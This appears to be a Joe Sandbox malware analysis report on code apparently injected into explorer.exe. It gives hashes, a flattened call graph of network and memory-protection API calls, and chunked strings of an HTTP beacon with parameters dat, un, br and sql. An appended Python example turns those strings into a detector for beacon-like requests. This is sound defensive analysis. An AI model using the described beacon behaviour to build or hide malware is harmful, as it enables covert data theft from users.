                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a1233c04b22dd7ed651ce6d5a36d780a31144635ce24d6bbb35eda56876751
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0190023120140812E60471588804686000587D1341F55C022A6028655F9A6989927135
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: cf19744ef4614a7d2d6d2683ce66af1339980ff575dae72a8a271d64a52c908d
                                                                                                                                                                                                                      • Instruction ID: 995903be01fd0d45c5af1e8d513f7bfc9653ee7b668342abda5c3c08af7274ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf19744ef4614a7d2d6d2683ce66af1339980ff575dae72a8a271d64a52c908d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B990023120140413E60071589508707000587D1341F55D422A0428558EDA5A89527125
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1909ae66023842979c94e9b53dbf6dd5178c3766b28b49dd11d3a9119c0e5be4
                                                                                                                                                                                                                      • Instruction ID: 1e1f2aed8ba679bbae41a9964dae7e99c5177d012e84c6b94151acece252e04a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1909ae66023842979c94e9b53dbf6dd5178c3766b28b49dd11d3a9119c0e5be4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D90022160540412E64071589418706001587D1341F55D022A0028554ECA5D8B5676A5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: d5f6fdbeafff1e301faaef7be423465506e21c4b1f1351df124b8e248ec06b8f
                                                                                                                                                                                                                      • Instruction ID: 1309d4ca2c01bfb04b8e0a28a5889c5f5c46597b8b89f996983732c35e844432
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5f6fdbeafff1e301faaef7be423465506e21c4b1f1351df124b8e248ec06b8f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7690023120140852E60071588404B46000587E1341F55C027A0128654E8A19C9527525
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0b8d9228a6ebf685279608ab25f6bb5532b2bf1d79f22075e7fb138f265ae8a5
                                                                                                                                                                                                                      • Instruction ID: a7dd55ed4145f3ff1e09cad7a5218382a55fc4ae3bd6305bf13c2f9715ce54e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b8d9228a6ebf685279608ab25f6bb5532b2bf1d79f22075e7fb138f265ae8a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D290023124140412E64171588404606000997D1381F95C023A0428554F8A598B57BA65
                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca0c0c934a5d6a32d4e3cf271057f9e0126ba05fe125b58821f586d8a4aeb906
• Instruction ID: 2df95d377a08ca18761eb282f23a2aaac9ee150b0c97b30f24fdb6c72c5db5be
• Opcode Fuzzy Hash: ca0c0c934a5d6a32d4e3cf271057f9e0126ba05fe125b58821f586d8a4aeb906
• Instruction Fuzzy Hash: 7990022120544452E60075589408A06000587D1345F55D022A1068595ECA398952B135
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb564b6c126e8d6e7efca81c18d443ceeb6f3d1ba55284ca91ef4135bd37f56f
• Instruction ID: 3e2ce80cd8c7b630f5c4aeed8684de5a44f1b5b8d5a420617c06f5c4dc8695b6
• Opcode Fuzzy Hash: fb564b6c126e8d6e7efca81c18d443ceeb6f3d1ba55284ca91ef4135bd37f56f
• Instruction Fuzzy Hash: FA90026120180413E64075588804607000587D1342F55C022A2068555F8E2D8D527139
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 00fdae2d39a49290eef9a274ce3ef8de74518828e394877d1d9edbdcd6ab5c85
• Instruction ID: 5075023bce4b5d04a12bfa8e2f90e405b7a6ce65f4a76459a575315fa3b6bbb0
• Opcode Fuzzy Hash: 00fdae2d39a49290eef9a274ce3ef8de74518828e394877d1d9edbdcd6ab5c85
• Instruction Fuzzy Hash: 4890022130140412E602715884146060009C7D2385F95C023E1428555E8A298A53B136
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f72dd972a728c4ea87925d9e0df63d7f6e0c3bd900dbd27b01bde6961b76f16b
• Instruction ID: 2ff981903f2ef6e93ccb12f699329100900438d7444a9d23d8a44a80a5a714bf
• Opcode Fuzzy Hash: f72dd972a728c4ea87925d9e0df63d7f6e0c3bd900dbd27b01bde6961b76f16b
• Instruction Fuzzy Hash: 2290023120180412E60071588808747000587D1342F55C022A5168555F8A69C9927535
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a171304594cf87da5b07a4d1d27886ed6ddfb473589f53c61704211bdda39bf2
• Instruction ID: 12c248dfb51c108a5ecd25000eb3e2424a88cbaa8bd0324696a3155374ca541a
• Opcode Fuzzy Hash: a171304594cf87da5b07a4d1d27886ed6ddfb473589f53c61704211bdda39bf2
• Instruction Fuzzy Hash: D190026121140052E60471588404706004587E2341F55C023A2158554DC92D8D626129
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e8bd705576467f788708b5e8bc9fc2df0583b14dc9d550ca9fde6a9cb80d98f8
• Instruction ID: 48dca4134c71b0b537e29a92c0ec4bc38ecdab662d20ba628466b1e6d06f6487
• Opcode Fuzzy Hash: e8bd705576467f788708b5e8bc9fc2df0583b14dc9d550ca9fde6a9cb80d98f8
• Instruction Fuzzy Hash: A790022124140812E6407158C4147070006C7D1741F55C022A0028554E8A1A8A6676B5
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 908161fa1bf765324de8e115683899944696253cb90061d6fc0dea91f19a63b3
• Instruction ID: 51dd75316d44a9955205afcfb5c991337f2472395dfc4527096e85bb6d2ef05f
• Opcode Fuzzy Hash: 908161fa1bf765324de8e115683899944696253cb90061d6fc0dea91f19a63b3
• Instruction Fuzzy Hash: 7E90022120184452E64072588804B0F410587E2342F95C02AA415A554DCD1989566725
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7421c0402db8c27a6277c94cc422d1c6e19e1d36f941628413aa469eddaa49b7
• Instruction ID: 908e2b593f21f36a93449136b2053701b584df330a8bf52d20a63e9a86b79a9c
• Opcode Fuzzy Hash: 7421c0402db8c27a6277c94cc422d1c6e19e1d36f941628413aa469eddaa49b7
• Instruction Fuzzy Hash: 9A90023160550412E60071588514706100587D1341F65C422A0428568E8B998A5275A6
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e58d258b816884e1ca939ac94a3adb0427ca104085f8c42ecbc945b6a33f3885
• Instruction ID: 9a6885a1fd2ea282cb18f897240086c7c2cb01fe6aa4e0ed9eda1b9099cf438e
• Opcode Fuzzy Hash: e58d258b816884e1ca939ac94a3adb0427ca104085f8c42ecbc945b6a33f3885
• Instruction Fuzzy Hash: 5F90022124545112E650715C84046164005A7E1341F55C032A0818594E895989567225
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2bcdc592d71d5028096a0a3a5836443e3b2e11291cd48ac973a6608800e58ea1
• Instruction ID: f0aa336df0f142df63d73ed93eae16addfee2759f4e7c326b08a7efb5cc612ad
• Opcode Fuzzy Hash: 2bcdc592d71d5028096a0a3a5836443e3b2e11291cd48ac973a6608800e58ea1
• Instruction Fuzzy Hash: 1A90023520140412EA1071589804646004687D1341F55D422A0428558E8A5889A2B125
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 907bfdf5efde5e00eb7748f62eed914d6d3c857134f834ad7cf2fb804eb39f27
• Instruction ID: 71aa13fbd463bb3028e2254f75ee3d64b023748735735a0fac6d38e7218a9ffb
• Opcode Fuzzy Hash: 907bfdf5efde5e00eb7748f62eed914d6d3c857134f834ad7cf2fb804eb39f27
• Instruction Fuzzy Hash: D190023120240152AA4072589804A4E410587E2342B95D426A0019554DCD1889626225
Strings
• CLIENT(ntdll): Processing section info %ws..., xrefs: 00FB4787
• Execute=1, xrefs: 00FB4713
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FB46FC
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FB4655
• ExecuteOptions, xrefs: 00FB46A0
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FB4725
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FB4742
Strings
• RTL: Re-Waiting, xrefs: 00FB031E
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FB02BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FB02E7
Strings
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00FB7B7F
• RTL: Re-Waiting, xrefs: 00FB7BAC
• RTL: Resource at %p, xrefs: 00FB7B8E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                      • API String ID: 0-871070163
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB728C
Strings
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00FB7294
• RTL: Re-Waiting, xrefs: 00FB72C1
• RTL: Resource at %p, xrefs: 00FB72A3
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 00FCCFBD
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @$@4Cw@4Cw
• API String ID: 4062629308-3101775584

Execution Graph

Execution Coverage: 2.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.7%
Total number of Nodes: 446
Total number of Limit Nodes: 17
13804->13809 13810 fe912c2 13805->13810 13808 fe94f82 6 API calls 13807->13808 13807->13809 13808->13809 13809->13800 13811 fe912cb 13810->13811 13812 fe912df 13810->13812 13811->13812 13813 fe910c2 6 API calls 13811->13813 13812->13809 13813->13812 13746 fe94232 13748 fe9425c 13746->13748 13749 fe94334 13746->13749 13747 fe94410 NtCreateFile 13747->13749 13748->13747 13748->13749 13895 fe8d2f4 13896 fe8d349 13895->13896 13897 fe8d49f 13896->13897 13899 fe898f2 NtProtectVirtualMemory 13896->13899 13898 fe898f2 NtProtectVirtualMemory 13897->13898 13902 fe8d4c3 13897->13902 13898->13902 13900 fe8d480 13899->13900 13901 fe898f2 NtProtectVirtualMemory 13900->13901 13901->13897 13903 fe898f2 NtProtectVirtualMemory 13902->13903 13904 fe8d597 13902->13904 13903->13904 13905 fe898f2 NtProtectVirtualMemory 13904->13905 13907 fe8d5bf 13904->13907 13905->13907 13906 fe8d6e1 13908 fe90382 ObtainUserAgentString 13906->13908 13909 fe898f2 NtProtectVirtualMemory 13907->13909 13910 fe8d6b9 13907->13910 13911 fe8d6e9 13908->13911 13909->13910 13910->13906 13912 fe898f2 NtProtectVirtualMemory 13910->13912 13912->13906 13834 fe8e14a 13835 fe8e153 13834->13835 13840 fe8e174 13834->13840 13837 fe90382 ObtainUserAgentString 13835->13837 13836 fe8e1e7 13838 fe8e16c 13837->13838 13839 fe890f2 6 API calls 13838->13839 13839->13840 13840->13836 13842 fe891f2 13840->13842 13843 fe8920f 13842->13843 13846 fe892c9 13842->13846 13844 fe93f12 7 API calls 13843->13844 13845 fe89242 13843->13845 13844->13845 13847 fe8a432 NtCreateFile 13845->13847 13849 fe89289 13845->13849 13846->13840 13847->13849 13848 fe890f2 6 API calls 13848->13846 13849->13846 13849->13848 13969 fe95e0a 13970 fe94942 13969->13970 13971 fe95e45 NtProtectVirtualMemory 13970->13971 13972 fe95e70 13971->13972 13941 fe96a4d 13942 fe96a53 13941->13942 13945 fe8a782 13942->13945 13944 fe96a6b 13947 fe8a78f 13945->13947 13946 fe8a7ad 13946->13944 13947->13946 13948 fe8f662 6 API calls 13947->13948 13948->13946 13734 fe94f82 13735 
fe94fb8 13734->13735 13736 fe915b2 socket 13735->13736 13737 fe95081 13735->13737 13742 fe95022 13735->13742 13736->13737 13738 fe95134 13737->13738 13740 fe95117 getaddrinfo 13737->13740 13737->13742 13739 fe91732 connect 13738->13739 13741 fe951b2 13738->13741 13738->13742 13739->13741 13740->13738 13741->13742 13743 fe916b2 send 13741->13743 13745 fe95729 13743->13745 13744 fe957f4 setsockopt recv 13744->13742 13745->13742 13745->13744 13785 fe8cdd9 13787 fe8cdf0 13785->13787 13786 fe8cecd 13787->13786 13788 fe90382 ObtainUserAgentString 13787->13788 13788->13786 13639 fe892dd 13643 fe8931a 13639->13643 13640 fe893fa 13641 fe89328 SleepEx 13641->13641 13641->13643 13643->13640 13643->13641 13646 fe93f12 13643->13646 13655 fe8a432 13643->13655 13665 fe890f2 13643->13665 13654 fe93f48 13646->13654 13647 fe94134 13647->13643 13648 fe940e9 13649 fe94125 13648->13649 13683 fe93842 13648->13683 13691 fe93922 13649->13691 13653 fe94232 NtCreateFile 13653->13654 13654->13647 13654->13648 13654->13653 13671 fe94f82 13654->13671 13656 fe8a45b 13655->13656 13664 fe8a4c9 13655->13664 13657 fe94232 NtCreateFile 13656->13657 13656->13664 13658 fe8a496 13657->13658 13663 fe8a4c5 13658->13663 13712 fe8a082 13658->13712 13659 fe94232 NtCreateFile 13659->13664 13661 fe8a4b6 13661->13663 13721 fe89f52 13661->13721 13663->13659 13663->13664 13664->13643 13666 fe89109 13665->13666 13670 fe891d3 13665->13670 13726 fe89012 13666->13726 13668 fe89113 13669 fe94f82 6 API calls 13668->13669 13668->13670 13669->13670 13670->13643 13672 fe94fb8 13671->13672 13674 fe95081 13672->13674 13679 fe95022 13672->13679 13699 fe915b2 13672->13699 13675 fe95134 13674->13675 13677 fe95117 getaddrinfo 13674->13677 13674->13679 13678 fe951b2 13675->13678 13675->13679 13702 fe91732 13675->13702 13677->13675 13678->13679 13705 fe916b2 13678->13705 13679->13654 13681 fe957f4 setsockopt recv 13681->13679 13682 fe95729 13682->13679 13682->13681 13684 fe9386d 13683->13684 13708 fe94232 13684->13708 13686 
fe93906 13686->13648 13687 fe93888 13687->13686 13688 fe94f82 6 API calls 13687->13688 13689 fe938c5 13687->13689 13688->13689 13689->13686 13690 fe94232 NtCreateFile 13689->13690 13690->13686 13692 fe939c2 13691->13692 13693 fe94232 NtCreateFile 13692->13693 13694 fe939d6 13693->13694 13695 fe93a9f 13694->13695 13697 fe94f82 6 API calls 13694->13697 13698 fe93a5d 13694->13698 13695->13647 13696 fe94232 NtCreateFile 13696->13695 13697->13698 13698->13695 13698->13696 13700 fe9160a socket 13699->13700 13701 fe915ec 13699->13701 13700->13674 13701->13700 13703 fe91788 connect 13702->13703 13704 fe9176a 13702->13704 13703->13678 13704->13703 13706 fe91705 send 13705->13706 13707 fe916e7 13705->13707 13706->13682 13707->13706 13710 fe9425c 13708->13710 13711 fe94334 13708->13711 13709 fe94410 NtCreateFile 13709->13711 13710->13709 13710->13711 13711->13687 13713 fe8a420 13712->13713 13714 fe8a0aa 13712->13714 13713->13661 13714->13713 13715 fe94232 NtCreateFile 13714->13715 13717 fe8a1f9 13715->13717 13716 fe8a3df 13716->13661 13717->13716 13718 fe94232 NtCreateFile 13717->13718 13719 fe8a3c9 13718->13719 13720 fe94232 NtCreateFile 13719->13720 13720->13716 13722 fe89f70 13721->13722 13723 fe89f84 13721->13723 13722->13663 13724 fe94232 NtCreateFile 13723->13724 13725 fe8a046 13724->13725 13725->13663 13728 fe89031 13726->13728 13727 fe890cd 13727->13668 13728->13727 13729 fe94f82 6 API calls 13728->13729 13729->13727 13913 fe8cedd 13914 fe8cf06 13913->13914 13915 fe8cfa4 13914->13915 13916 fe898f2 NtProtectVirtualMemory 13914->13916 13917 fe8cf9c 13916->13917 13918 fe90382 ObtainUserAgentString 13917->13918 13918->13915 13973 fe96a1f 13974 fe96a25 13973->13974 13977 fe8a5f2 13974->13977 13976 fe96a3d 13978 fe8a5fb 13977->13978 13979 fe8a60e 13977->13979 13978->13979 13980 fe8f662 6 API calls 13978->13980 13979->13976 13980->13979 13750 fe95e12 13751 fe95e45 NtProtectVirtualMemory 13750->13751 13752 fe94942 13750->13752 13753 fe95e70 13751->13753 13752->13751 13981 
fe8a613 13983 fe8a620 13981->13983 13982 fe8a67e 13983->13982 13984 fe95e12 NtProtectVirtualMemory 13983->13984 13984->13983 13919 fe8ecd4 13921 fe8ecd8 13919->13921 13920 fe8f022 13921->13920 13922 fe8e352 NtCreateFile 13921->13922 13923 fe8ef0d 13922->13923 13923->13920 13924 fe8e792 NtCreateFile 13923->13924 13924->13923

                                                                                                                                                                                                                      Control-flow Graph

Control-flow graph of fe94f82 (basic blocks fe94f82 to fe95920; the interactive block graph is not reproduced). Calls in block order: fe915b2 (socket), fe94942, fe91552, fe91732 (connect), getaddrinfo, then string-building helpers fe95d62, fe92482, fe91e72, fe96002, fe95d92, fe92042 and fe96262 (the latter called many times in a row), fe916b2 (send), fe91382 / fe917b2, and finally setsockopt and recv in the block at fe957f4. Two exits: the normal path through fe958e6 / fe958ee and the early-failure path through fe958f6.
APIs
• getaddrinfo, setsockopt, recv (called directly; socket, connect and send go through the wrappers fe915b2, fe91732 and fe916b2, see the graph above)
Strings
• Co, &br=, &sql, &un=, : cl, GET , dat=, nnec, ose, tion (4-byte chunks; "Co"+"nnec"+"tion"+": cl"+"ose" is the header "Connection: close", "GET " plus "dat=", "&un=", "&br=", "&sql" are the request line and query parameters of the beacon)
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false (the region is not backed by a PE image on disk, consistent with the injected code reported in the signatures)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd (the snapshot name ties this region to the explorer process)
Similarity
• API ID: getaddrinforecvsetsockopt
• String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
• API String ID: 1564272048-1117930895
• Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction ID: 3d2259028d3cbbeaecc0de3be09c5d8aa9ffc02d803d4a5879d77e5abbab6d8b
• Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction Fuzzy Hash: B6527E30618B088BCB69EF68C4947E9B7E1FB94304F54562EC49FCB146DE34B54ACBA1
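Added example, not part of the Joe Sandbox report and not code from the sample: the String ID of fe94f82 lists the constants the function uses, joined with '$' and sorted, so the order in which the code assembles them is lost. The Python below splits that field, searches for an ordered tiling of a known string from the 4-byte chunks (five of them produce exactly "Connection: close", while "&sql" cannot be completed to "&sql=..." from the listed pieces), and turns the recovered parameter names dat, un, br and sql into a check over HTTP request lines. The request lines are constructed for illustration; that all four names travel in one GET, and that "&sql" is the start of an "&sql=" parameter, are assumptions drawn from the fragments, not something the report states.

```python
"""Reassemble the chunked string constants reported for fe94f82 and turn the
recovered HTTP parameter names into a request-line check (added example)."""
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# String ID field of the fe94f82 entry, copied from the report. Joe Sandbox
# joins the individual constants with '$' and lists them sorted, so the
# order in which the code uses them is not recoverable from the field alone.
STRING_ID = "Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion"


def split_string_id(field: str) -> List[str]:
    """Split a Joe Sandbox String ID into the individual constants."""
    return field.split("$")


def tile(target: str, fragments: List[str]) -> Optional[List[str]]:
    """Return the fragments, in order, that concatenate to `target`, using
    each fragment at most once; None if the set cannot produce it.
    Depth-first search; fragment sets are tiny so this is instant."""
    def rec(pos: int, remaining: List[str]) -> Optional[List[str]]:
        if pos == len(target):
            return []
        for i, frag in enumerate(remaining):
            if frag and target.startswith(frag, pos):
                rest = rec(pos + len(frag), remaining[:i] + remaining[i + 1:])
                if rest is not None:
                    return [frag] + rest
        return None
    return rec(0, list(fragments))


# Query-string names recovered from "dat=", "&un=", "&br=" and "&sql".
# Assumption: "&sql" is the start of a fourth "&sql=..." parameter whose
# 4-character chunk in the report ends just before the '='.
BEACON_KEYS = {"dat", "un", "br", "sql"}


def is_beacon_like_request(request_line: str) -> bool:
    """True for a GET whose query string carries every beacon key.
    Key order and values are not assumed; only the names are checked."""
    parts = request_line.split(" ")
    if len(parts) < 2 or parts[0] != "GET":
        return False
    query = urlsplit(parts[1]).query
    names = set(parse_qs(query, keep_blank_values=True))
    return BEACON_KEYS <= names


def beacon_like_lines(request_lines: List[str]) -> List[str]:
    """Filter HTTP request lines down to the beacon-like ones."""
    return [line for line in request_lines if is_beacon_like_request(line)]


# Constructed request lines for illustration, not traffic from the sample.
SAMPLE_REQUESTS = [
    "GET /bn12/?dat=QUJD&un=user01&br=ff&sql=1 HTTP/1.1",
    "GET /bn12/?sql=1&br=ie&un=user01&dat=QUJD HTTP/1.1",
    "GET /search?q=dat HTTP/1.1",
    "POST /bn12/ HTTP/1.1",
]

if __name__ == "__main__":
    frags = split_string_id(STRING_ID)
    print("fragments:", frags)
    print("Connection: close <-", tile("Connection: close", frags))
    print("&sql=1 <-", tile("&sql=1", frags))
    print("flagged:", beacon_like_lines(SAMPLE_REQUESTS))
```

Run as a script to print the tiling and the flagged lines; request lines from a proxy log or a Suricata http.uri field can be fed to beacon_like_lines the same way. Because the check only looks at parameter names, pair a hit with the destination host or with the "Connection: close" header recovered from the same fragment set before acting on it.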

                                                                                                                                                                                                                      Control-flow Graph

Control-flow graph of fe94232 (basic blocks fe94232 to fe948cd; the interactive block graph is not reproduced). The function is a large branch tree that calls fe94942 at many points and reaches NtCreateFile in the block at fe94410, followed by fe94172; a further path calls fe95e92 (fe94657 to fe9466b). Exits through the common block at fe94378 / fe9437a and through fe948ae / fe948bd.
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
• API ID: CreateFile
• String ID: `
• API String ID: 823142352-2679148245
• Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction ID: 5fa5b1f2f884873b7c1070d7f293f964709167dae11ebbf484817473e7f258ee
• Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction Fuzzy Hash: DC225C70A18B099FCB59DF28C4946AEF7E1FB98305F80522EE45ED7291DB30E552CB81

                                                                                                                                                                                                                      Control-flow Graph

Control-flow graph of fe95e12 (basic blocks fe95e12 to fe95e8f; the interactive block graph is not reproduced): entry at fe95e12, optional call to fe94942 at fe95e40, NtProtectVirtualMemory in the block fe95e45 to fe95e6e, then one of two exit blocks (fe95e70 or fe95e7d).
APIs
• NtProtectVirtualMemory.NTDLL ref: 0FE95E67
Memory Dump Source
• Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
Similarity
